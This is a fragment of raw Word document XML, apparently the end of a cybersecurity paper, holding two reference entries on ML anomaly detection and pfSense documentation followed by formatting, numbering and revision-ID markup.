          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Y. Ma and W. Wang, “Machine learning for cybersecurity: The basics of anomaly detection,” IEEE Security &amp; Privacy, vol. 18, no. 4, pp. 72–75, Jul./Aug. 2020. [Online]. Available: https://doi.org/10.1109/MSEC.2020.2990106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D1AD9" w14:textId="51DA19CA" w:rsidR="002C056E" w:rsidRPr="00FF6966" w:rsidRDefault="002C056E" w:rsidP="00CE6B18">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Netgate, pfSense Documentation. [Online]. Available: https://docs.netgate.com/pfsense/en/latest/index.html. [Accessed: Dec. 11, 2024].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE68F8" w14:textId="77777777" w:rsidR="008147B5" w:rsidRPr="00FF6966" w:rsidRDefault="008147B5" w:rsidP="00DA1153">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CBC4D6A" w14:textId="1A3ADF22" w:rsidR="00836367" w:rsidRPr="00FF6966" w:rsidRDefault="00836367" w:rsidP="00DA1153">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:sectPr w:rsidR="00836367" w:rsidRPr="00FF6966" w:rsidSect="003B4E04">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1080" w:right="907" w:bottom="1440" w:left="907" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="360"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF2B8B8" w14:textId="0B259308" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009303D9" w:rsidP="005B520E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009303D9" w:rsidRPr="00FF6966"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C24A70" w14:textId="77777777" w:rsidR="00D349AF" w:rsidRDefault="00D349AF" w:rsidP="001A3B3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="357D02E6" w14:textId="77777777" w:rsidR="00D349AF" w:rsidRDefault="00D349AF" w:rsidP="001A3B3D">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="46E20B29" w14:textId="77777777" w:rsidR="00D349AF" w:rsidRDefault="00D349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NimbusRomNo9L-Regu">
    <w:altName w:val="Yu Gothic"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="08070000" w:usb2="00000010" w:usb3="00000000" w:csb0="0002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9563342"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="5A7DA04C" w14:textId="2ADC6842" w:rsidR="009E16AB" w:rsidRDefault="009E16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480674" w14:textId="77777777" w:rsidR="00FC1F6C" w:rsidRDefault="00FC1F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1846927"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="373D7EFE" w14:textId="76F25EF8" w:rsidR="009E16AB" w:rsidRDefault="009E16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E75918" w14:textId="2AA5D733" w:rsidR="001A3B3D" w:rsidRPr="009E16AB" w:rsidRDefault="001A3B3D" w:rsidP="0056610F">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CC64C3" w14:textId="77777777" w:rsidR="00D349AF" w:rsidRDefault="00D349AF" w:rsidP="001A3B3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4D6ED939" w14:textId="77777777" w:rsidR="00D349AF" w:rsidRDefault="00D349AF" w:rsidP="001A3B3D">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="29E8226C" w14:textId="77777777" w:rsidR="00D349AF" w:rsidRDefault="00D349A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AF709D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04C2CD6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15772CF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C225946"/>
    <w:lvl w:ilvl="0" w:tplc="4B92B1B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1008" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="SimSun" w:hAnsi="Symbol" w:cs="Times New Roman"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16515278"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2BA8316C"/>
    <w:lvl w:ilvl="0" w:tplc="4B92B1B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1368" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="SimSun" w:hAnsi="Symbol" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003">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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C767F4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98A8FFF0"/>
    <w:lvl w:ilvl="0" w:tplc="4B92B1B2">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910B95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB805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33590A9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4963894"/>
    <w:lvl w:ilvl="0" w:tplc="9AF2B28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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34AA0943"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1CCDF8E"/>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4189603E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B608F6D6"/>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21554C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37005F32"/>
    <w:lvl w:ilvl="0" w:tplc="4B92B1B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1368" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="SimSun" w:hAnsi="Symbol"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369909383">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="568543031">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1207790780">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="629168631">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1032806882">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1614826021">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1871990542">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2088458160">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="231694775">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2126189682">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="771515552">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1603688421">
    <w:abstractNumId w:val="16"/>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24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1312517118">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1622414874">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="101580859">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1543790595">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1019544023">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="110172399">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1321498771">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="17719676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2B5"/>
    <w:rsid w:val="00001487"/>
    <w:rsid w:val="00001B98"/>
    <w:rsid w:val="00001C38"/>
    <w:rsid w:val="00002EDC"/>
    <w:rsid w:val="00003109"/>
    <w:rsid w:val="0000605B"/>
    <w:rsid w:val="00010F23"/>
    <w:rsid w:val="00011632"/>
    <w:rsid w:val="00011F0D"/>
    <w:rsid w:val="00012532"/>
    <w:rsid w:val="00012967"/>
    <w:rsid w:val="000151F5"/>
    <w:rsid w:val="000218F3"/>
    <w:rsid w:val="000220E5"/>
    <w:rsid w:val="00023C88"/>
    <w:rsid w:val="000258B4"/>
    <w:rsid w:val="0002596C"/>
    <w:rsid w:val="00027566"/>
    <w:rsid w:val="00027697"/>
    <w:rsid w:val="00027889"/>
    <w:rsid w:val="00030020"/>
    <w:rsid w:val="00031513"/>
    <w:rsid w:val="00031E41"/>
    <w:rsid w:val="000324CF"/>
    <w:rsid w:val="00032743"/>
    <w:rsid w:val="00034BD7"/>
    <w:rsid w:val="000352CA"/>
    <w:rsid w:val="00035894"/>
    <w:rsid w:val="00035E01"/>
    <w:rsid w:val="00036644"/>
    <w:rsid w:val="00042589"/>
    <w:rsid w:val="00043462"/>
    <w:rsid w:val="00043F4D"/>
    <w:rsid w:val="00044E4E"/>
    <w:rsid w:val="000451AD"/>
    <w:rsid w:val="000451BF"/>
    <w:rsid w:val="000459A3"/>
    <w:rsid w:val="00046512"/>
    <w:rsid w:val="00046537"/>
    <w:rsid w:val="00046D53"/>
    <w:rsid w:val="0004781E"/>
    <w:rsid w:val="00050000"/>
    <w:rsid w:val="00052EC4"/>
    <w:rsid w:val="00053488"/>
    <w:rsid w:val="000539A9"/>
    <w:rsid w:val="00053DDC"/>
    <w:rsid w:val="00054111"/>
    <w:rsid w:val="0005512F"/>
    <w:rsid w:val="000564CD"/>
    <w:rsid w:val="00056F2F"/>
    <w:rsid w:val="000600B3"/>
    <w:rsid w:val="000616B5"/>
    <w:rsid w:val="00061B99"/>
    <w:rsid w:val="0006237E"/>
    <w:rsid w:val="000644C6"/>
    <w:rsid w:val="000668A6"/>
    <w:rsid w:val="000670FC"/>
    <w:rsid w:val="0006742A"/>
    <w:rsid w:val="0006760F"/>
    <w:rsid w:val="00070932"/>
    <w:rsid w:val="00070E6D"/>
    <w:rsid w:val="00070F73"/>
    <w:rsid w:val="00071B17"/>
    <w:rsid w:val="00071B31"/>
    <w:rsid w:val="00071CAD"/>
    <w:rsid w:val="0007298E"/>
    <w:rsid w:val="00072DDE"/>
    <w:rsid w:val="00074473"/>
    <w:rsid w:val="00074D6C"/>
    <w:rsid w:val="00075783"/>
    <w:rsid w:val="00075E95"/>
    <w:rsid w:val="00076038"/>
    <w:rsid w:val="00076AC0"/>
    <w:rsid w:val="00077554"/>
    <w:rsid w:val="00077DD1"/>
    <w:rsid w:val="00080E0F"/>
    <w:rsid w:val="00083DBF"/>
    <w:rsid w:val="00084745"/>
    <w:rsid w:val="000849A4"/>
    <w:rsid w:val="00084AC3"/>
    <w:rsid w:val="000855FD"/>
    <w:rsid w:val="00085A9D"/>
    <w:rsid w:val="00086B68"/>
    <w:rsid w:val="00086E02"/>
    <w:rsid w:val="0008758A"/>
    <w:rsid w:val="00091AE2"/>
    <w:rsid w:val="00092095"/>
    <w:rsid w:val="0009306F"/>
    <w:rsid w:val="000953F9"/>
    <w:rsid w:val="00095537"/>
    <w:rsid w:val="00096132"/>
    <w:rsid w:val="00096C2C"/>
    <w:rsid w:val="00096FBC"/>
    <w:rsid w:val="00097B50"/>
    <w:rsid w:val="000A06CB"/>
    <w:rsid w:val="000A0EAF"/>
    <w:rsid w:val="000A2515"/>
    <w:rsid w:val="000A2FA6"/>
    <w:rsid w:val="000A555F"/>
    <w:rsid w:val="000A59CE"/>
    <w:rsid w:val="000A6050"/>
    <w:rsid w:val="000B1136"/>
    <w:rsid w:val="000B261B"/>
    <w:rsid w:val="000B4488"/>
    <w:rsid w:val="000B5DCF"/>
    <w:rsid w:val="000B71FE"/>
    <w:rsid w:val="000B74DB"/>
    <w:rsid w:val="000C069D"/>
    <w:rsid w:val="000C0B89"/>
    <w:rsid w:val="000C1181"/>
    <w:rsid w:val="000C1E68"/>
    <w:rsid w:val="000C30AA"/>
    <w:rsid w:val="000C47AD"/>
    <w:rsid w:val="000C4ABE"/>
    <w:rsid w:val="000C4AFA"/>
    <w:rsid w:val="000C5CDC"/>
    <w:rsid w:val="000C635C"/>
    <w:rsid w:val="000C6BCA"/>
    <w:rsid w:val="000C6FDA"/>
    <w:rsid w:val="000C7D9D"/>
    <w:rsid w:val="000C7F2E"/>
    <w:rsid w:val="000D04D1"/>
    <w:rsid w:val="000D1E06"/>
    <w:rsid w:val="000D23B9"/>
    <w:rsid w:val="000D2FAC"/>
    <w:rsid w:val="000D3B55"/>
    <w:rsid w:val="000D3CD6"/>
    <w:rsid w:val="000D47DE"/>
    <w:rsid w:val="000D48B7"/>
    <w:rsid w:val="000D4C25"/>
    <w:rsid w:val="000D70CC"/>
    <w:rsid w:val="000E00BB"/>
    <w:rsid w:val="000E158E"/>
    <w:rsid w:val="000E1688"/>
    <w:rsid w:val="000E23E1"/>
    <w:rsid w:val="000E333A"/>
    <w:rsid w:val="000E3B92"/>
    <w:rsid w:val="000E3D36"/>
    <w:rsid w:val="000E4564"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000E61FF"/>
    <w:rsid w:val="000F2708"/>
    <w:rsid w:val="000F271A"/>
    <w:rsid w:val="000F34A9"/>
    <w:rsid w:val="000F379A"/>
    <w:rsid w:val="000F39F1"/>
    <w:rsid w:val="000F3AB4"/>
    <w:rsid w:val="000F43F0"/>
    <w:rsid w:val="000F509C"/>
    <w:rsid w:val="000F650E"/>
    <w:rsid w:val="000F6A8C"/>
    <w:rsid w:val="000F7398"/>
    <w:rsid w:val="00100559"/>
    <w:rsid w:val="0010107D"/>
    <w:rsid w:val="001019FD"/>
    <w:rsid w:val="0010233B"/>
    <w:rsid w:val="00103075"/>
    <w:rsid w:val="00103FE5"/>
    <w:rsid w:val="00104BFE"/>
    <w:rsid w:val="00105D2F"/>
    <w:rsid w:val="00106330"/>
    <w:rsid w:val="00106412"/>
    <w:rsid w:val="00106968"/>
    <w:rsid w:val="00106D3B"/>
    <w:rsid w:val="00107B5F"/>
    <w:rsid w:val="00110126"/>
    <w:rsid w:val="00110705"/>
    <w:rsid w:val="00110E87"/>
    <w:rsid w:val="001113E9"/>
    <w:rsid w:val="001117DE"/>
    <w:rsid w:val="00114E4E"/>
    <w:rsid w:val="00114FAB"/>
    <w:rsid w:val="00115004"/>
    <w:rsid w:val="0011618E"/>
    <w:rsid w:val="00116B48"/>
    <w:rsid w:val="00116CF0"/>
    <w:rsid w:val="00116E08"/>
    <w:rsid w:val="001176A5"/>
    <w:rsid w:val="00117789"/>
    <w:rsid w:val="0012195E"/>
    <w:rsid w:val="00121B08"/>
    <w:rsid w:val="00122E82"/>
    <w:rsid w:val="00123D45"/>
    <w:rsid w:val="00123FB0"/>
    <w:rsid w:val="0012457C"/>
    <w:rsid w:val="00126978"/>
    <w:rsid w:val="00127767"/>
    <w:rsid w:val="00127A6A"/>
    <w:rsid w:val="00130902"/>
    <w:rsid w:val="00131E8D"/>
    <w:rsid w:val="0013369F"/>
    <w:rsid w:val="00133E9B"/>
    <w:rsid w:val="001341B2"/>
    <w:rsid w:val="001353C3"/>
    <w:rsid w:val="00136FB6"/>
    <w:rsid w:val="0013708D"/>
    <w:rsid w:val="00142B3A"/>
    <w:rsid w:val="001433CD"/>
    <w:rsid w:val="00145AB5"/>
    <w:rsid w:val="001464D2"/>
    <w:rsid w:val="0014688B"/>
    <w:rsid w:val="00146D0C"/>
    <w:rsid w:val="0014729C"/>
    <w:rsid w:val="00147988"/>
    <w:rsid w:val="00147F27"/>
    <w:rsid w:val="00151609"/>
    <w:rsid w:val="001516DF"/>
    <w:rsid w:val="00154AF0"/>
    <w:rsid w:val="00155CDF"/>
    <w:rsid w:val="00156795"/>
    <w:rsid w:val="00157F19"/>
    <w:rsid w:val="001606DA"/>
    <w:rsid w:val="0016154A"/>
    <w:rsid w:val="00162342"/>
    <w:rsid w:val="00162B6D"/>
    <w:rsid w:val="00163440"/>
    <w:rsid w:val="00163561"/>
    <w:rsid w:val="00163CBB"/>
    <w:rsid w:val="00163D8A"/>
    <w:rsid w:val="00163E6F"/>
    <w:rsid w:val="00166914"/>
    <w:rsid w:val="00167779"/>
    <w:rsid w:val="001704E5"/>
    <w:rsid w:val="00171EF0"/>
    <w:rsid w:val="00174992"/>
    <w:rsid w:val="00176CFB"/>
    <w:rsid w:val="001772AD"/>
    <w:rsid w:val="00177688"/>
    <w:rsid w:val="001779F6"/>
    <w:rsid w:val="001834DD"/>
    <w:rsid w:val="001836DA"/>
    <w:rsid w:val="00184836"/>
    <w:rsid w:val="001849E8"/>
    <w:rsid w:val="00185A11"/>
    <w:rsid w:val="00186D5F"/>
    <w:rsid w:val="00193BD6"/>
    <w:rsid w:val="00193E78"/>
    <w:rsid w:val="00195221"/>
    <w:rsid w:val="00195FD9"/>
    <w:rsid w:val="00196D7E"/>
    <w:rsid w:val="001974F0"/>
    <w:rsid w:val="00197DD5"/>
    <w:rsid w:val="001A0B2E"/>
    <w:rsid w:val="001A1335"/>
    <w:rsid w:val="001A2EFD"/>
    <w:rsid w:val="001A30C1"/>
    <w:rsid w:val="001A3B3D"/>
    <w:rsid w:val="001A3D26"/>
    <w:rsid w:val="001A53DA"/>
    <w:rsid w:val="001A56AE"/>
    <w:rsid w:val="001A5D53"/>
    <w:rsid w:val="001A5EBD"/>
    <w:rsid w:val="001A603E"/>
    <w:rsid w:val="001A6CA3"/>
    <w:rsid w:val="001A7AAC"/>
    <w:rsid w:val="001B0FA2"/>
    <w:rsid w:val="001B21CA"/>
    <w:rsid w:val="001B2B52"/>
    <w:rsid w:val="001B2BBE"/>
    <w:rsid w:val="001B2F60"/>
    <w:rsid w:val="001B3656"/>
    <w:rsid w:val="001B67DC"/>
    <w:rsid w:val="001C0984"/>
    <w:rsid w:val="001C0DF7"/>
    <w:rsid w:val="001C1108"/>
    <w:rsid w:val="001C1CF4"/>
    <w:rsid w:val="001C2BD0"/>
    <w:rsid w:val="001C2ECF"/>
    <w:rsid w:val="001C2FEB"/>
    <w:rsid w:val="001C4802"/>
    <w:rsid w:val="001C5674"/>
    <w:rsid w:val="001C5BB0"/>
    <w:rsid w:val="001C6A95"/>
    <w:rsid w:val="001C72D9"/>
    <w:rsid w:val="001D0402"/>
    <w:rsid w:val="001D04D9"/>
    <w:rsid w:val="001D162B"/>
    <w:rsid w:val="001D3642"/>
    <w:rsid w:val="001D385D"/>
    <w:rsid w:val="001D4801"/>
    <w:rsid w:val="001D4AE0"/>
    <w:rsid w:val="001D5226"/>
    <w:rsid w:val="001D5D84"/>
    <w:rsid w:val="001D6734"/>
    <w:rsid w:val="001D777A"/>
    <w:rsid w:val="001E2DDA"/>
    <w:rsid w:val="001E3B57"/>
    <w:rsid w:val="001E4454"/>
    <w:rsid w:val="001E4FDB"/>
    <w:rsid w:val="001E5656"/>
    <w:rsid w:val="001E5FED"/>
    <w:rsid w:val="001E7310"/>
    <w:rsid w:val="001E7D36"/>
    <w:rsid w:val="001F0EB3"/>
    <w:rsid w:val="001F116D"/>
    <w:rsid w:val="001F2881"/>
    <w:rsid w:val="001F338F"/>
    <w:rsid w:val="001F61A9"/>
    <w:rsid w:val="001F6B72"/>
    <w:rsid w:val="001F6F8B"/>
    <w:rsid w:val="001F7006"/>
    <w:rsid w:val="001F7A4E"/>
    <w:rsid w:val="00200517"/>
    <w:rsid w:val="00201284"/>
    <w:rsid w:val="00201F2F"/>
    <w:rsid w:val="0020207E"/>
    <w:rsid w:val="002027D6"/>
    <w:rsid w:val="00202E48"/>
    <w:rsid w:val="0020304C"/>
    <w:rsid w:val="0020310F"/>
    <w:rsid w:val="00203704"/>
    <w:rsid w:val="00205412"/>
    <w:rsid w:val="00206618"/>
    <w:rsid w:val="0020663D"/>
    <w:rsid w:val="00207835"/>
    <w:rsid w:val="002111B5"/>
    <w:rsid w:val="0021156E"/>
    <w:rsid w:val="00213104"/>
    <w:rsid w:val="00213BBF"/>
    <w:rsid w:val="00214B09"/>
    <w:rsid w:val="00214CB0"/>
    <w:rsid w:val="00216B8C"/>
    <w:rsid w:val="002171F9"/>
    <w:rsid w:val="0022009D"/>
    <w:rsid w:val="0022093A"/>
    <w:rsid w:val="00221DBF"/>
    <w:rsid w:val="002239EE"/>
    <w:rsid w:val="002249EB"/>
    <w:rsid w:val="002254A9"/>
    <w:rsid w:val="00226E95"/>
    <w:rsid w:val="00230172"/>
    <w:rsid w:val="00230747"/>
    <w:rsid w:val="00231838"/>
    <w:rsid w:val="00232139"/>
    <w:rsid w:val="00232534"/>
    <w:rsid w:val="00233D97"/>
    <w:rsid w:val="002347A2"/>
    <w:rsid w:val="00235F81"/>
    <w:rsid w:val="00236761"/>
    <w:rsid w:val="00236BD5"/>
    <w:rsid w:val="0024038D"/>
    <w:rsid w:val="002419F7"/>
    <w:rsid w:val="002446AE"/>
    <w:rsid w:val="002446D9"/>
    <w:rsid w:val="002449A8"/>
    <w:rsid w:val="00247485"/>
    <w:rsid w:val="002529E2"/>
    <w:rsid w:val="00253D23"/>
    <w:rsid w:val="002549FF"/>
    <w:rsid w:val="00254A10"/>
    <w:rsid w:val="00255459"/>
    <w:rsid w:val="002608E6"/>
    <w:rsid w:val="00261D83"/>
    <w:rsid w:val="0026248E"/>
    <w:rsid w:val="002628BC"/>
    <w:rsid w:val="00263BF9"/>
    <w:rsid w:val="0026546E"/>
    <w:rsid w:val="0026591E"/>
    <w:rsid w:val="002705F1"/>
    <w:rsid w:val="00270A62"/>
    <w:rsid w:val="00271D0B"/>
    <w:rsid w:val="0027273C"/>
    <w:rsid w:val="00272E3C"/>
    <w:rsid w:val="00273800"/>
    <w:rsid w:val="00273C43"/>
    <w:rsid w:val="002741D6"/>
    <w:rsid w:val="00275409"/>
    <w:rsid w:val="00276F34"/>
    <w:rsid w:val="00277D68"/>
    <w:rsid w:val="0028103B"/>
    <w:rsid w:val="002811CE"/>
    <w:rsid w:val="00281514"/>
    <w:rsid w:val="00281B2B"/>
    <w:rsid w:val="00281ECF"/>
    <w:rsid w:val="00283929"/>
    <w:rsid w:val="00283CC5"/>
    <w:rsid w:val="002850E3"/>
    <w:rsid w:val="00285AB0"/>
    <w:rsid w:val="0028619D"/>
    <w:rsid w:val="0028660A"/>
    <w:rsid w:val="00292928"/>
    <w:rsid w:val="002929F4"/>
    <w:rsid w:val="00293BFC"/>
    <w:rsid w:val="0029487A"/>
    <w:rsid w:val="00295798"/>
    <w:rsid w:val="00296875"/>
    <w:rsid w:val="00296AB1"/>
    <w:rsid w:val="00296F0F"/>
    <w:rsid w:val="00297816"/>
    <w:rsid w:val="00297C9E"/>
    <w:rsid w:val="00297FF9"/>
    <w:rsid w:val="002A0173"/>
    <w:rsid w:val="002A2081"/>
    <w:rsid w:val="002A4179"/>
    <w:rsid w:val="002A525A"/>
    <w:rsid w:val="002A5531"/>
    <w:rsid w:val="002A6D9F"/>
    <w:rsid w:val="002A783B"/>
    <w:rsid w:val="002A78CB"/>
    <w:rsid w:val="002A7977"/>
    <w:rsid w:val="002B100E"/>
    <w:rsid w:val="002B17B5"/>
    <w:rsid w:val="002B24D2"/>
    <w:rsid w:val="002B3EEA"/>
    <w:rsid w:val="002B46CA"/>
    <w:rsid w:val="002B5CEF"/>
    <w:rsid w:val="002B6105"/>
    <w:rsid w:val="002B6B30"/>
    <w:rsid w:val="002B7E55"/>
    <w:rsid w:val="002C056E"/>
    <w:rsid w:val="002C1219"/>
    <w:rsid w:val="002C1E7D"/>
    <w:rsid w:val="002C252B"/>
    <w:rsid w:val="002C29E2"/>
    <w:rsid w:val="002C3991"/>
    <w:rsid w:val="002C4945"/>
    <w:rsid w:val="002C4BCD"/>
    <w:rsid w:val="002C5AB2"/>
    <w:rsid w:val="002C5CCA"/>
    <w:rsid w:val="002C6C81"/>
    <w:rsid w:val="002C7132"/>
    <w:rsid w:val="002C78BB"/>
    <w:rsid w:val="002D2570"/>
    <w:rsid w:val="002D46EE"/>
    <w:rsid w:val="002D4E75"/>
    <w:rsid w:val="002D56D9"/>
    <w:rsid w:val="002D5BFE"/>
    <w:rsid w:val="002D6BA5"/>
    <w:rsid w:val="002D736E"/>
    <w:rsid w:val="002D77CB"/>
    <w:rsid w:val="002D7D1B"/>
    <w:rsid w:val="002E1E02"/>
    <w:rsid w:val="002E1E37"/>
    <w:rsid w:val="002E207B"/>
    <w:rsid w:val="002E2B7E"/>
    <w:rsid w:val="002E33BD"/>
    <w:rsid w:val="002E36D7"/>
    <w:rsid w:val="002E4290"/>
    <w:rsid w:val="002E46EA"/>
    <w:rsid w:val="002E70E9"/>
    <w:rsid w:val="002E75FB"/>
    <w:rsid w:val="002E77E8"/>
    <w:rsid w:val="002F0864"/>
    <w:rsid w:val="002F1130"/>
    <w:rsid w:val="002F147A"/>
    <w:rsid w:val="002F1914"/>
    <w:rsid w:val="002F1FC8"/>
    <w:rsid w:val="002F2592"/>
    <w:rsid w:val="002F2FA0"/>
    <w:rsid w:val="002F3DD6"/>
    <w:rsid w:val="002F5AAC"/>
    <w:rsid w:val="002F78A6"/>
    <w:rsid w:val="002F7C95"/>
    <w:rsid w:val="003009B1"/>
    <w:rsid w:val="00300A5B"/>
    <w:rsid w:val="00300A61"/>
    <w:rsid w:val="00301887"/>
    <w:rsid w:val="003021D1"/>
    <w:rsid w:val="003031D6"/>
    <w:rsid w:val="003043D3"/>
    <w:rsid w:val="00304599"/>
    <w:rsid w:val="00305288"/>
    <w:rsid w:val="00307A57"/>
    <w:rsid w:val="00311472"/>
    <w:rsid w:val="00312510"/>
    <w:rsid w:val="00313DA1"/>
    <w:rsid w:val="003141DE"/>
    <w:rsid w:val="003149D4"/>
    <w:rsid w:val="0031620E"/>
    <w:rsid w:val="00316B2E"/>
    <w:rsid w:val="00316B3B"/>
    <w:rsid w:val="0032000C"/>
    <w:rsid w:val="00320087"/>
    <w:rsid w:val="0032145B"/>
    <w:rsid w:val="00321521"/>
    <w:rsid w:val="003237A6"/>
    <w:rsid w:val="003244DA"/>
    <w:rsid w:val="00324FED"/>
    <w:rsid w:val="00326D89"/>
    <w:rsid w:val="003274CC"/>
    <w:rsid w:val="00327A64"/>
    <w:rsid w:val="00331D8D"/>
    <w:rsid w:val="00333618"/>
    <w:rsid w:val="00334396"/>
    <w:rsid w:val="00337DE5"/>
    <w:rsid w:val="00340BF5"/>
    <w:rsid w:val="0034215C"/>
    <w:rsid w:val="00343A4C"/>
    <w:rsid w:val="00343D40"/>
    <w:rsid w:val="00344285"/>
    <w:rsid w:val="0034436D"/>
    <w:rsid w:val="00345B39"/>
    <w:rsid w:val="0034632A"/>
    <w:rsid w:val="0034789A"/>
    <w:rsid w:val="00347BE6"/>
    <w:rsid w:val="003525EB"/>
    <w:rsid w:val="00353E37"/>
    <w:rsid w:val="00354D0E"/>
    <w:rsid w:val="00354FCF"/>
